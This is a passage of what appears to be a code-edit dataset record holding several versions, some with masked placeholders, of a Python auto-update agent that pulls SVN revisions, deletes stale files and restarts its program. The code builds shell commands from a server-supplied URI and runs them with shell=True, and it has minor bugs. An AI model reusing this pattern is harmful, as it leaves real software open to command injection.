moduleReturn['revision_date'] = dateStr\n localLog.debug('Revision date: ' + dateStr)\n commentStr = outputList[outputList.index('svn:log') + 1].strip()\n moduleReturn['revision_comment'] = commentStr\n localLog.debug('Revision Comment: ' + commentStr)\n if err is not None:\n localLog.debug('Error message: ' + str(err))\n except Exception as e:\n self.log.error('Oops! Something went wrong - ' + str(e))\n return moduleReturn\n\n def updateSoftware(self, swRev='HEAD'):\n \"\"\"\n Get and updating software from server\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.updateSoftware')\n localLog.debug('Getting software revision ' + str(swRev) +\n ' from server and updating local client...')\n localLog.debug('Constructing target path for new software...')\n targetRoot = self._location\n targetDir = 'gcm'\n targetPath = os.path.join(targetRoot, targetDir)\n localLog.debug('Target path: ' + targetPath)\n localLog.debug('Retrieving relevant parameters from server...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n localLog.debug('Getting software files from server...')\n pCmd = 'svn export --force -r ' + str(swRev)\n pCmd += ' ' + guaSWServerURI\n pCmd += ' ' + targetPath\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n if err is not None:\n self.log.warning('Error message: ' + str(err))\n else:\n self.log.info('Download successful!')\n for line in output.splitlines():\n self.log.info(line)\n except Exception as e:\n self.log.error('Oops! Something went wrong - ' + str(e))\n localLog.debug('Reading downloaded revision from \"' + output.\n splitlines()[-1] + '\"...')\n revText = output.splitlines()[-1].split()[-1][:-1]\n localLog.debug('Downloaded Revision: ' + revText)\n self.localRevisionRecord = revText\n localLog.debug('Listing downloaded files...')\n downloadedFiles = []\n for row in output.splitlines()[:-1]:\n file = os.path.join(targetRoot, [t.strip() for t in row.split()][1]\n )\n downloadedFiles.append(file)\n localLog.debug('File: ' + file)\n self.log.debug('Getting all files in local directory (after update)...'\n )\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n localLog.debug('File: ' + allFiles[-1])\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n localLog.debug('Dir: ' + allFiles[-1])\n self.log.info(\n 'Identifying old files to remove (<new_files> - <all_files>)...')\n diffFiles = list(set(allFiles) - set(downloadedFiles))\n for file in diffFiles:\n self.log.info('Removing: ' + file)\n try:\n if os.path.isfile(file):\n os.unlink(file)\n elif os.path.isdir(file):\n shutil.rmtree(file)\n except Exception as e:\n self.log.warning('Oops! Something went wrong! - ' + str(e))\n self.log.debug('Re-getting all files in local directory...')\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n self.log.debug('File: ' + os.path.join(r, file))\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n self.log.debug('Dir: ' + os.path.join(r, file))\n\n def run(self):\n \"\"\"\n Run Greger Update Agent.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.run')\n self.log.info('Starting Greger Update Agent (GUA)...')\n localLog.debug('Wait for Greger Client Module to start...')\n self.ready.wait()\n allThreads = {}\n for thr in enumerate():\n localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!'\n )\n allThreads.update({thr.__class__.__name__: thr})\n if thr.__class__.__name__ == 'GregerClientModule':\n localLog.debug('Greger Client Module thread found! ' +\n allThreads['GregerClientModule'].name)\n loopCount = 0\n while not self.stopExecution.is_set():\n loopCount += 1\n localLog.debug('Checking for updates (' + str(loopCount) + ')...')\n localLog.debug('Getting local revision record...')\n localRevision = self.localRevisionRecord\n localLog.debug('Getting latest software info...')\n softwareInfo = self.getSoftwareInfo()\n self.log.info('Revision check done! (' + str(localRevision) + ')')\n if int(localRevision) == int(softwareInfo['revision']):\n self.log.info('No new revision found.')\n else:\n self.log.info('New revision found!')\n localLog.debug('Attempting to update software...')\n self.updateSoftware()\n localLog.debug(\n 'Attempting to update server with software info...')\n allThreads['GregerDatabase'].update('about', softwareInfo)\n self.log.info(\n 'Attempting to stop all exection before restarting...')\n allThreads['GregerClientModule'].stopAll(GUA=True)\n self.log.info('Attemption to restart application...')\n restart_program()\n if 'guaCheckUpdateDelay' in GregerDatabase.settings:\n delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][\n 'value']\n else:\n delayTime = 10\n self.log.warning('Settings not defined! (using default=10)')\n self.log.info('Waiting ' + str(delayTime) + 's...')\n self.stopExecution.wait(delayTime)\n self.log.info('Greger Update Agent (GUA) execution stopped!')\n",
"step-3": "<mask token>\n\n\nclass GregerUpdateAgent(Thread):\n <mask token>\n\n def __init__(self, ready=None):\n \"\"\"\n Initialize the main class\n \"\"\"\n Thread.__init__(self)\n self.ready = ready\n self.logPath = 'root.GUA'\n self.log = logging.getLogger(self.logPath)\n localLog = logging.getLogger(self.logPath + '.__init__')\n localLog.debug('Initiating Greger Update Agent (GUA)...')\n self.stopExecution = Event()\n self._location = os.path.abspath(__file__)\n self._location = self._location[:-15]\n localLog.debug('Local path: ' + self._location)\n localLog.debug('Getting configuration parameters from file...')\n config = getLocalConfig()\n self.localRevisionRecordPath = config.get('greger_update_agent',\n 'local_revision_path')\n localLog.debug('Parameter: (localRevisionRecordPath) ' + self.\n localRevisionRecordPath)\n self.log.info('Greger Update Agent (GUA) successfully initiated!')\n\n @property\n def localRevisionRecord(self):\n \"\"\"\n Get local revision record (.gcm)\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.localRevisionRecord')\n localLog.debug('Getting local revision record...')\n revisionRecordPath = self.localRevisionRecordPath\n localLog.debug('Attemption to get record from file...')\n try:\n with open(revisionRecordPath, 'r') as f:\n localRecord = f.read()\n localLog.debug('Local revision record: ' + str(localRecord))\n except Exception as e:\n self.log.warning('Failed to open file! - ' + str(e))\n self.localRevisionRecord = 0\n localRecord = self.localRevisionRecord\n return localRecord\n\n @localRevisionRecord.setter\n def localRevisionRecord(self, newRevision):\n \"\"\"\n Set local revision record (.gcm)\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.localRevisionRecord')\n localLog.debug('Setting local revision record (.gcm) to ' + str(\n newRevision) + '...')\n revisionRecordPath = self.localRevisionRecordPath\n localLog.debug('Attemption to write \"' + str(newRevision) +\n '\" to file...')\n with open(revisionRecordPath, 'w') as f:\n f.write(str(newRevision))\n self.log.info('Local revision record set: ' + str(newRevision))\n\n def getSoftwareInfo(self, rev='HEAD'):\n \"\"\"\n Retrieve information about a revision available on server.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')\n localLog.debug('Attempting to retrieve software revision info...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n moduleReturn = {'revision': '', 'revision_SHA': '',\n 'revision_author': '', 'revision_date': '', 'revision_comment': ''}\n localLog.debug('Attempting to retrieve info from server... ' +\n guaSWServerURI)\n pCmd = 'svn proplist -v -R --revprop -r ' + rev\n pCmd += ' ' + guaSWServerURI\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n outputList = output.splitlines()[1:]\n outputList = [elem.strip() for elem in outputList]\n revStr = output.splitlines()[0]\n revStr = revStr.split()[-1]\n moduleReturn['revision'] = revStr[:-1]\n localLog.debug('Revision: ' + revStr[:-1])\n shaStr = outputList[outputList.index('git-commit') + 1]\n moduleReturn['revision_SHA'] = shaStr\n localLog.debug('Revision SHA: ' + shaStr)\n authorStr = outputList[outputList.index('svn:author') + 1]\n moduleReturn['revision_author'] = authorStr\n localLog.debug('Revision author: ' + authorStr)\n dateStr = outputList[outputList.index('svn:date') + 1]\n moduleReturn['revision_date'] = dateStr\n localLog.debug('Revision date: ' + dateStr)\n commentStr = outputList[outputList.index('svn:log') + 1].strip()\n moduleReturn['revision_comment'] = commentStr\n localLog.debug('Revision Comment: ' + commentStr)\n if err is not None:\n localLog.debug('Error message: ' + str(err))\n except Exception as e:\n self.log.error('Oops! Something went wrong - ' + str(e))\n return moduleReturn\n\n def updateSoftware(self, swRev='HEAD'):\n \"\"\"\n Get and updating software from server\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.updateSoftware')\n localLog.debug('Getting software revision ' + str(swRev) +\n ' from server and updating local client...')\n localLog.debug('Constructing target path for new software...')\n targetRoot = self._location\n targetDir = 'gcm'\n targetPath = os.path.join(targetRoot, targetDir)\n localLog.debug('Target path: ' + targetPath)\n localLog.debug('Retrieving relevant parameters from server...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n localLog.debug('Getting software files from server...')\n pCmd = 'svn export --force -r ' + str(swRev)\n pCmd += ' ' + guaSWServerURI\n pCmd += ' ' + targetPath\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n if err is not None:\n self.log.warning('Error message: ' + str(err))\n else:\n self.log.info('Download successful!')\n for line in output.splitlines():\n self.log.info(line)\n except Exception as e:\n self.log.error('Oops! Something went wrong - ' + str(e))\n localLog.debug('Reading downloaded revision from \"' + output.\n splitlines()[-1] + '\"...')\n revText = output.splitlines()[-1].split()[-1][:-1]\n localLog.debug('Downloaded Revision: ' + revText)\n self.localRevisionRecord = revText\n localLog.debug('Listing downloaded files...')\n downloadedFiles = []\n for row in output.splitlines()[:-1]:\n file = os.path.join(targetRoot, [t.strip() for t in row.split()][1]\n )\n downloadedFiles.append(file)\n localLog.debug('File: ' + file)\n self.log.debug('Getting all files in local directory (after update)...'\n )\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n localLog.debug('File: ' + allFiles[-1])\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n localLog.debug('Dir: ' + allFiles[-1])\n self.log.info(\n 'Identifying old files to remove (<new_files> - <all_files>)...')\n diffFiles = list(set(allFiles) - set(downloadedFiles))\n for file in diffFiles:\n self.log.info('Removing: ' + file)\n try:\n if os.path.isfile(file):\n os.unlink(file)\n elif os.path.isdir(file):\n shutil.rmtree(file)\n except Exception as e:\n self.log.warning('Oops! Something went wrong! - ' + str(e))\n self.log.debug('Re-getting all files in local directory...')\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n self.log.debug('File: ' + os.path.join(r, file))\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n self.log.debug('Dir: ' + os.path.join(r, file))\n\n def run(self):\n \"\"\"\n Run Greger Update Agent.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.run')\n self.log.info('Starting Greger Update Agent (GUA)...')\n localLog.debug('Wait for Greger Client Module to start...')\n self.ready.wait()\n allThreads = {}\n for thr in enumerate():\n localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!'\n )\n allThreads.update({thr.__class__.__name__: thr})\n if thr.__class__.__name__ == 'GregerClientModule':\n localLog.debug('Greger Client Module thread found! ' +\n allThreads['GregerClientModule'].name)\n loopCount = 0\n while not self.stopExecution.is_set():\n loopCount += 1\n localLog.debug('Checking for updates (' + str(loopCount) + ')...')\n localLog.debug('Getting local revision record...')\n localRevision = self.localRevisionRecord\n localLog.debug('Getting latest software info...')\n softwareInfo = self.getSoftwareInfo()\n self.log.info('Revision check done! (' + str(localRevision) + ')')\n if int(localRevision) == int(softwareInfo['revision']):\n self.log.info('No new revision found.')\n else:\n self.log.info('New revision found!')\n localLog.debug('Attempting to update software...')\n self.updateSoftware()\n localLog.debug(\n 'Attempting to update server with software info...')\n allThreads['GregerDatabase'].update('about', softwareInfo)\n self.log.info(\n 'Attempting to stop all exection before restarting...')\n allThreads['GregerClientModule'].stopAll(GUA=True)\n self.log.info('Attemption to restart application...')\n restart_program()\n if 'guaCheckUpdateDelay' in GregerDatabase.settings:\n delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][\n 'value']\n else:\n delayTime = 10\n self.log.warning('Settings not defined! (using default=10)')\n self.log.info('Waiting ' + str(delayTime) + 's...')\n self.stopExecution.wait(delayTime)\n self.log.info('Greger Update Agent (GUA) execution stopped!')\n",
"step-4": "<mask token>\n\n\nclass GregerUpdateAgent(Thread):\n \"\"\"\n Main class which holds the main sequence of the application.\n \"\"\"\n\n def __init__(self, ready=None):\n \"\"\"\n Initialize the main class\n \"\"\"\n Thread.__init__(self)\n self.ready = ready\n self.logPath = 'root.GUA'\n self.log = logging.getLogger(self.logPath)\n localLog = logging.getLogger(self.logPath + '.__init__')\n localLog.debug('Initiating Greger Update Agent (GUA)...')\n self.stopExecution = Event()\n self._location = os.path.abspath(__file__)\n self._location = self._location[:-15]\n localLog.debug('Local path: ' + self._location)\n localLog.debug('Getting configuration parameters from file...')\n config = getLocalConfig()\n self.localRevisionRecordPath = config.get('greger_update_agent',\n 'local_revision_path')\n localLog.debug('Parameter: (localRevisionRecordPath) ' + self.\n localRevisionRecordPath)\n self.log.info('Greger Update Agent (GUA) successfully initiated!')\n\n @property\n def localRevisionRecord(self):\n \"\"\"\n Get local revision record (.gcm)\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.localRevisionRecord')\n localLog.debug('Getting local revision record...')\n revisionRecordPath = self.localRevisionRecordPath\n localLog.debug('Attemption to get record from file...')\n try:\n with open(revisionRecordPath, 'r') as f:\n localRecord = f.read()\n localLog.debug('Local revision record: ' + str(localRecord))\n except Exception as e:\n self.log.warning('Failed to open file! - ' + str(e))\n self.localRevisionRecord = 0\n localRecord = self.localRevisionRecord\n return localRecord\n\n @localRevisionRecord.setter\n def localRevisionRecord(self, newRevision):\n \"\"\"\n Set local revision record (.gcm)\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.localRevisionRecord')\n localLog.debug('Setting local revision record (.gcm) to ' + str(\n newRevision) + '...')\n revisionRecordPath = self.localRevisionRecordPath\n localLog.debug('Attemption to write \"' + str(newRevision) +\n '\" to file...')\n with open(revisionRecordPath, 'w') as f:\n f.write(str(newRevision))\n self.log.info('Local revision record set: ' + str(newRevision))\n\n def getSoftwareInfo(self, rev='HEAD'):\n \"\"\"\n Retrieve information about a revision available on server.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')\n localLog.debug('Attempting to retrieve software revision info...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n moduleReturn = {'revision': '', 'revision_SHA': '',\n 'revision_author': '', 'revision_date': '', 'revision_comment': ''}\n localLog.debug('Attempting to retrieve info from server... ' +\n guaSWServerURI)\n pCmd = 'svn proplist -v -R --revprop -r ' + rev\n pCmd += ' ' + guaSWServerURI\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n outputList = output.splitlines()[1:]\n outputList = [elem.strip() for elem in outputList]\n revStr = output.splitlines()[0]\n revStr = revStr.split()[-1]\n moduleReturn['revision'] = revStr[:-1]\n localLog.debug('Revision: ' + revStr[:-1])\n shaStr = outputList[outputList.index('git-commit') + 1]\n moduleReturn['revision_SHA'] = shaStr\n localLog.debug('Revision SHA: ' + shaStr)\n authorStr = outputList[outputList.index('svn:author') + 1]\n moduleReturn['revision_author'] = authorStr\n localLog.debug('Revision author: ' + authorStr)\n dateStr = outputList[outputList.index('svn:date') + 1]\n moduleReturn['revision_date'] = dateStr\n localLog.debug('Revision date: ' + dateStr)\n commentStr = outputList[outputList.index('svn:log') + 1].strip()\n moduleReturn['revision_comment'] = commentStr\n localLog.debug('Revision Comment: ' + commentStr)\n if err is not None:\n localLog.debug('Error message: ' + str(err))\n except Exception as e:\n self.log.error('Oops! Something went wrong - ' + str(e))\n return moduleReturn\n\n def updateSoftware(self, swRev='HEAD'):\n \"\"\"\n Get and updating software from server\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.updateSoftware')\n localLog.debug('Getting software revision ' + str(swRev) +\n ' from server and updating local client...')\n localLog.debug('Constructing target path for new software...')\n targetRoot = self._location\n targetDir = 'gcm'\n targetPath = os.path.join(targetRoot, targetDir)\n localLog.debug('Target path: ' + targetPath)\n localLog.debug('Retrieving relevant parameters from server...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n localLog.debug('Getting software files from server...')\n pCmd = 'svn export --force -r ' + str(swRev)\n pCmd += ' ' + guaSWServerURI\n pCmd += ' ' + targetPath\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n if err is not None:\n self.log.warning('Error message: ' + str(err))\n else:\n self.log.info('Download successful!')\n for line in output.splitlines():\n self.log.info(line)\n except Exception as e:\n self.log.error('Oops! Something went wrong - ' + str(e))\n localLog.debug('Reading downloaded revision from \"' + output.\n splitlines()[-1] + '\"...')\n revText = output.splitlines()[-1].split()[-1][:-1]\n localLog.debug('Downloaded Revision: ' + revText)\n self.localRevisionRecord = revText\n localLog.debug('Listing downloaded files...')\n downloadedFiles = []\n for row in output.splitlines()[:-1]:\n file = os.path.join(targetRoot, [t.strip() for t in row.split()][1]\n )\n downloadedFiles.append(file)\n localLog.debug('File: ' + file)\n self.log.debug('Getting all files in local directory (after update)...'\n )\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n localLog.debug('File: ' + allFiles[-1])\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n localLog.debug('Dir: ' + allFiles[-1])\n self.log.info(\n 'Identifying old files to remove (<new_files> - <all_files>)...')\n diffFiles = list(set(allFiles) - set(downloadedFiles))\n for file in diffFiles:\n self.log.info('Removing: ' + file)\n try:\n if os.path.isfile(file):\n os.unlink(file)\n elif os.path.isdir(file):\n shutil.rmtree(file)\n except Exception as e:\n self.log.warning('Oops! Something went wrong! - ' + str(e))\n self.log.debug('Re-getting all files in local directory...')\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n self.log.debug('File: ' + os.path.join(r, file))\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n self.log.debug('Dir: ' + os.path.join(r, file))\n\n def run(self):\n \"\"\"\n Run Greger Update Agent.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.run')\n self.log.info('Starting Greger Update Agent (GUA)...')\n localLog.debug('Wait for Greger Client Module to start...')\n self.ready.wait()\n allThreads = {}\n for thr in enumerate():\n localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!'\n )\n allThreads.update({thr.__class__.__name__: thr})\n if thr.__class__.__name__ == 'GregerClientModule':\n localLog.debug('Greger Client Module thread found! ' +\n allThreads['GregerClientModule'].name)\n loopCount = 0\n while not self.stopExecution.is_set():\n loopCount += 1\n localLog.debug('Checking for updates (' + str(loopCount) + ')...')\n localLog.debug('Getting local revision record...')\n localRevision = self.localRevisionRecord\n localLog.debug('Getting latest software info...')\n softwareInfo = self.getSoftwareInfo()\n self.log.info('Revision check done! (' + str(localRevision) + ')')\n if int(localRevision) == int(softwareInfo['revision']):\n self.log.info('No new revision found.')\n else:\n self.log.info('New revision found!')\n localLog.debug('Attempting to update software...')\n self.updateSoftware()\n localLog.debug(\n 'Attempting to update server with software info...')\n allThreads['GregerDatabase'].update('about', softwareInfo)\n self.log.info(\n 'Attempting to stop all exection before restarting...')\n allThreads['GregerClientModule'].stopAll(GUA=True)\n self.log.info('Attemption to restart application...')\n restart_program()\n if 'guaCheckUpdateDelay' in GregerDatabase.settings:\n delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][\n 'value']\n else:\n delayTime = 10\n self.log.warning('Settings not defined! (using default=10)')\n self.log.info('Waiting ' + str(delayTime) + 's...')\n self.stopExecution.wait(delayTime)\n self.log.info('Greger Update Agent (GUA) execution stopped!')\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nGreger Update Agent (GUA) module for the Greger Client Module\n\"\"\"\n\n__author__ = \"Eric Sandbling\"\n__license__ = 'MIT'\n__status__ = 'Development'\n\n# System modules\nimport os, sys\nimport shutil\nimport logging\nimport subprocess\nfrom threading import Event\nfrom threading import Thread\nfrom threading import enumerate\n\n# Local Modules\nfrom common import getLocalConfig\nfrom common import restart_program\nfrom gdb import GregerDatabase\n# from gcm import GregerClientModule\n\nclass GregerUpdateAgent(Thread):\n \"\"\"\n Main class which holds the main sequence of the application.\n \"\"\"\n\n def __init__(self, ready=None):\n '''\n Initialize the main class\n '''\n Thread.__init__(self)\n self.ready = ready\n\n # Setup logging\n self.logPath = \"root.GUA\"\n self.log = logging.getLogger(self.logPath)\n localLog = logging.getLogger(self.logPath + \".__init__\")\n localLog.debug(\"Initiating Greger Update Agent (GUA)...\")\n\n # Stop execution handler\n self.stopExecution = Event()\n\n # Get local path\n self._location = os.path.abspath(__file__)\n self._location = self._location[:-15] # Trim gcm/__main__.py from path to get at location of application\n localLog.debug(\"Local path: \" + self._location)\n\n # Get Local Configuration Parameters\n localLog.debug(\"Getting configuration parameters from file...\")\n config = getLocalConfig()\n\n # Locally relevant parameters\n self.localRevisionRecordPath = config.get(\"greger_update_agent\", \"local_revision_path\")\n localLog.debug(\"Parameter: (localRevisionRecordPath) \" + self.localRevisionRecordPath)\n\n\n self.log.info(\"Greger Update Agent (GUA) successfully initiated!\")\n\n @property\n def localRevisionRecord(self):\n '''\n Get local revision record (.gcm)\n '''\n # Logging\n localLog = logging.getLogger(self.logPath + \".localRevisionRecord\")\n localLog.debug(\"Getting local revision record...\")\n\n # Local parameters\n # revisionRecordPath = os.path.join(self._location, \".gcm\")\n revisionRecordPath = self.localRevisionRecordPath\n\n localLog.debug(\"Attemption to get record from file...\")\n try:\n with open(revisionRecordPath,\"r\") as f:\n localRecord = f.read()\n localLog.debug(\"Local revision record: \" + str(localRecord))\n except Exception as e:\n self.log.warning(\"Failed to open file! - \" + str(e))\n self.localRevisionRecord = 0\n localRecord = self.localRevisionRecord\n\n return localRecord\n\n @localRevisionRecord.setter\n def localRevisionRecord(self, newRevision):\n '''\n Set local revision record (.gcm)\n '''\n # Logging\n localLog = logging.getLogger(self.logPath + \".localRevisionRecord\")\n localLog.debug(\"Setting local revision record (.gcm) to \" + str(newRevision) + \"...\")\n\n # Local parameters\n # revisionRecordPath = os.path.join(self._location, \".gcm\")\n revisionRecordPath = self.localRevisionRecordPath\n\n localLog.debug(\"Attemption to write \\\"\" + str(newRevision) + \"\\\" to file...\")\n with open(revisionRecordPath,\"w\") as f:\n f.write(str(newRevision))\n self.log.info(\"Local revision record set: \" + str(newRevision))\n\n def getSoftwareInfo(self, rev='HEAD'):\n '''\n Retrieve information about a revision available on server.\n '''\n # Logging\n localLog = logging.getLogger(self.logPath + \".getSoftwareInfo\")\n localLog.debug(\"Attempting to retrieve software revision info...\")\n\n # Locally relevant parameters\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n else:\n self.log.warning(\"Setting \" + str(guaSWSource) + \" not defined!\")\n return\n moduleReturn = {\n 'revision': \"\",\n 'revision_SHA' : \"\",\n 'revision_author' : \"\",\n 'revision_date' : \"\",\n 'revision_comment' : \"\"\n }\n\n # Get server revision info\n localLog.debug(\"Attempting to retrieve info from server... \" + guaSWServerURI)\n pCmd = \"svn proplist -v -R --revprop -r \" + rev\n pCmd += \" \" + guaSWServerURI\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n (output, err) = p.communicate()\n\n # Create list of output and remove extra white spaces\n outputList = output.splitlines()[1:]\n outputList = [elem.strip() for elem in outputList]\n\n # Get revision from output\n revStr = output.splitlines()[0]\n revStr = revStr.split()[-1]\n moduleReturn['revision'] = revStr[:-1]\n localLog.debug(\"Revision: \" + revStr[:-1])\n\n # Get SHA\n shaStr = outputList[outputList.index('git-commit')+1]\n moduleReturn['revision_SHA'] = shaStr\n localLog.debug(\"Revision SHA: \" + shaStr)\n\n # Get revision author\n authorStr = outputList[outputList.index('svn:author')+1]\n moduleReturn['revision_author'] = authorStr\n localLog.debug(\"Revision author: \" + authorStr)\n\n # Get revision date\n dateStr = outputList[outputList.index('svn:date')+1]\n moduleReturn['revision_date'] = dateStr\n localLog.debug(\"Revision date: \" + dateStr)\n\n # Get revision comment\n commentStr = outputList[outputList.index('svn:log')+1].strip()\n moduleReturn['revision_comment'] = commentStr\n localLog.debug(\"Revision Comment: \" + commentStr)\n\n if err is not None:\n localLog.debug(\"Error message: \" + str(err))\n\n except Exception as e:\n self.log.error(\"Oops! Something went wrong - \" + str(e))\n\n return moduleReturn\n\n def updateSoftware(self, swRev='HEAD'):\n '''\n Get and updating software from server\n '''\n # Logging\n localLog = logging.getLogger(self.logPath + \".updateSoftware\")\n localLog.debug(\"Getting software revision \" + str(swRev) + \" from server and updating local client...\")\n\n # Locally relevant parameters\n localLog.debug(\"Constructing target path for new software...\")\n targetRoot = self._location\n targetDir = \"gcm\"\n targetPath = os.path.join(targetRoot, targetDir)\n localLog.debug(\"Target path: \" + targetPath)\n localLog.debug(\"Retrieving relevant parameters from server...\")\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n localLog.debug(\"Parameter: (guaSWSource) \" + guaSWServerURI)\n else:\n self.log.warning(\"Setting \" + str(guaSWSource) + \" not defined!\")\n return\n\n # Get software files from server\n localLog.debug(\"Getting software files from server...\")\n\n # Compile download command\n pCmd = \"svn export --force -r \" + str(swRev)\n pCmd += \" \" + guaSWServerURI\n pCmd += \" \" + targetPath\n localLog.debug(pCmd)\n\n # Execute command\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n (output, err) = p.communicate()\n\n if err is not None:\n self.log.warning(\"Error message: \" + str(err))\n else:\n self.log.info(\"Download successful!\")\n # Print output\n for line in output.splitlines():\n self.log.info(line)\n\n except Exception as e:\n self.log.error(\"Oops! Something went wrong - \" + str(e))\n\n # Read revision text\n localLog.debug(\"Reading downloaded revision from \\\"\" + output.splitlines()[-1] + \"\\\"...\")\n revText = output.splitlines()[-1].split()[-1][:-1]\n localLog.debug(\"Downloaded Revision: \" + revText)\n\n # Update local revision record\n self.localRevisionRecord = revText\n\n # Get downloaded files text\n localLog.debug(\"Listing downloaded files...\")\n downloadedFiles = []\n for row in output.splitlines()[:-1]:\n file = os.path.join(targetRoot, [t.strip() for t in row.split()][1])\n downloadedFiles.append(file)\n localLog.debug(\"File: \" + file)\n\n # List files in directory\n self.log.debug(\"Getting all files in local directory (after update)...\")\n allFiles = []\n # r=root, d=directories, f = files\n for r, d, f in os.walk(targetPath):\n for file in f:\n # allFiles.append(os.path.abspath(file))\n allFiles.append(os.path.join(r, file))\n localLog.debug(\"File: \" + allFiles[-1])\n # localLog.debug(\"File: \" + os.path.join(r, file))\n for dir in d:\n # allFiles.append(os.path.abspath(dir))\n allFiles.append(os.path.join(r, dir))\n localLog.debug(\"Dir: \" + allFiles[-1])\n # localLog.debug(\"Dir: \" + os.path.join(r, dir))\n\n self.log.info(\"Identifying old files to remove (<new_files> - <all_files>)...\")\n diffFiles = list(set(allFiles) - set(downloadedFiles))\n for file in diffFiles:\n self.log.info(\"Removing: \" + file)\n try:\n if os.path.isfile(file):\n os.unlink(file)\n elif os.path.isdir(file):\n shutil.rmtree(file)\n except Exception as e:\n self.log.warning(\"Oops! Something went wrong! - \" + str(e))\n\n # List files in directory\n self.log.debug(\"Re-getting all files in local directory...\")\n allFiles = []\n # r=root, d=directories, f = files\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n self.log.debug(\"File: \" + os.path.join(r, file))\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n self.log.debug(\"Dir: \" + os.path.join(r, file))\n\n def run(self):\n '''\n Run Greger Update Agent.\n '''\n # Logging\n localLog = logging.getLogger(self.logPath + \".run\")\n self.log.info(\"Starting Greger Update Agent (GUA)...\")\n\n # Wait for Greger Client Module to start...\n localLog.debug(\"Wait for Greger Client Module to start...\")\n self.ready.wait()\n\n # Get all active threads!\n allThreads = {}\n for thr in enumerate():\n localLog.debug(thr.name + \" \" + thr.__class__.__name__ +\" active!\")\n allThreads.update({thr.__class__.__name__ : thr})\n if thr.__class__.__name__ == \"GregerClientModule\":\n localLog.debug(\"Greger Client Module thread found! \" +\n allThreads['GregerClientModule'].name)\n\n # Start checking for updates\n loopCount = 0\n while not self.stopExecution.is_set():\n loopCount += 1\n localLog.debug(\"Checking for updates (\" + str(loopCount) + \")...\")\n\n # Get local revision record\n localLog.debug(\"Getting local revision record...\")\n localRevision = self.localRevisionRecord\n\n # Get server revision...\n localLog.debug(\"Getting latest software info...\")\n softwareInfo = self.getSoftwareInfo()\n self.log.info(\"Revision check done! (\" + str(localRevision) + \")\")\n\n if int(localRevision) == int(softwareInfo['revision']):\n self.log.info(\"No new revision found.\")\n else:\n self.log.info(\"New revision found!\")\n\n # Do update!!\n localLog.debug(\"Attempting to update software...\")\n self.updateSoftware()\n\n # Update server with updated software\n 